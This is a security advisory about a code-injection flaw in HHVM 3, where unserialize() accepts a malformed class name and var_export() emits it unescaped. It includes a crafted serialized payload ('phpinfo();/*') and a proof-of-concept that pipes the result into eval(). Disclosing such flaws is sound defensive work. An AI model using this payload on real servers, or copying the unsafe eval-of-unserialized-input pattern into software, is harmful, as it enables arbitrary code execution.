pch-015.md

February 16, 2015 ยท View on GitHub

Code Injection Vulnerability via unserialize() Function and var_export() Function in HHVM 3

Taoguang Chen <@chtg> - 2014.10.29

HHVM's var_export() function wrongly handles an undefined class, and unserialize() function wrongly handles an invalid classname.

HHVM's var_export() function

HHVM's var_export() function had a parse error when exporting an undefined class:**

<?php

$str = 'O:7:"phpinfo":0:{}';
$obj = unserialize($str);
var_dump($obj);
var_export($obj);

The outputs in PHP >= 5.1:

object(__PHP_Incomplete_Class)#1 (1) {
  ["__PHP_Incomplete_Class_Name"]=>
  string(7) "phpinfo"
}
__PHP_Incomplete_Class::__set_state(array(
   '__PHP_Incomplete_Class_Name' => 'phpinfo',
))

The outputs in HHVM 3:

object(__PHP_Incomplete_Class)#1 (1) {
  ["__PHP_Incomplete_Class_Name"]=>
  string(7) "phpinfo"
}
phpinfo::__set_state(array(
))

HHVM's unserialize() funciton

HHVM's unserialize() funciton had a classname parse error when unserializing object:**

<?php

$str = 'O:12:"phpinfo();/*":0:{}';
$obj = unserialize($str);
var_dump($obj);

The outputs in PHP >= 5.1:

Notice: unserialize(): Error at offset 13 of 24 bytes in ...
bool(false)

The outputs in HHVM 3:

object(__PHP_Incomplete_Class)#1 (1) {
  ["__PHP_Incomplete_Class_Name"]=>
  string(12) "phpinfo();/*"
}

Code Injection Vulnerability

Exploit these bug, it is possible to inject arbitrary code. The codes below shows a dangerous way to use unserialize() function and var_export() function :)**

<?php

$str = 'O:12:"phpinfo();/*":0:{}';
$obj = unserialize($str);
// var_export($obj);
eval('$str = ' . var_export($obj, true) . ';');

The outputs in HHVM 3:

// phpinfo();/*::__set_state(array(
// ))
// ok! phpinfo() function executed:)
HipHop